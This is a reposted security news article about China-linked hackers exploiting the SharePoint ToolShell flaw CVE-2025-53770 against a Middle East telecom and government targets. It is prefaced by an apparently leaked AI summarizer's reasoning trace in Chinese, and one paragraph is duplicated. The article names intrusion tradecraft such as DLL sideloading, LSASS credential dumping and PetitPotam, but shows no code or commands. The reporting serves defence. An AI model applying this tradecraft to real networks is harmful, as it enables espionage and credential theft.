嗯,用户让我总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”之类的开头。好的,我先看看这篇文章讲的是什么。 文章主要讲的是中国相关的黑客利用微软修复的ToolShell漏洞CVE-2025-53770攻击中东的一家电信公司。漏洞是在七月份被修复的,但黑客很快就利用了它。Symantec Threat Hunter Team报告说,这些黑客还攻击了多个目标,包括非洲和南美的政府机构、美国的一所大学等。他们使用了多种恶意软件和工具,比如Zingdoor和KrustyLoader,并且还利用 PetitPotam 技术窃取凭证。 所以,我需要把这些关键点浓缩到100字以内。首先提到中国黑客利用已修复的漏洞攻击中东电信公司。然后说明攻击的时间是在补丁发布后不久。接着提到他们还攻击了其他多个目标,并使用了多种工具和技术进行网络间谍活动。 这样组织起来应该可以控制在100字左右。检查一下有没有遗漏的重要信息,比如漏洞的编号、攻击的时间点、使用的工具和影响范围。都涵盖了的话,就可以开始写了。 </think> 中国相关黑客利用微软修复的ToolShell漏洞CVE-2025-53770,在补丁发布后迅速攻击中东一家电信公司,并针对多个目标展开网络间谍活动,使用恶意软件和工具窃取凭证并长期潜伏。 2025-10-24 08:37:53 Author: securityaffairs.com(查看原文) 阅读量:22 收藏
China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom
China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.
China-linked threat actors exploited the ToolShell SharePoint flaw vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East after it was addressed by Microsoft in July 2025.
“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025.” reads the report published by Broadcom’s Symantec Threat Hunter Team.
According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.
In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), which is under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server, an unauthorized attacker could exploit the vulnerability to execute code over a network.
Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon aka (Sheathminer), and Storm-2603, had exploited ToolShell, with the latter deploying Warlock ransomware.
Also targeted were government departments in an African country, as well as government agencies in South America, a university in the U.S., as well as likely a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.
According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premise SharePoint servers that could be used to bypass authentication and achieve remote code execution.
Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.
“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed.” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”
The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.
The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.
“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, ToolShell)
如有侵权请联系:admin#unsafe.sh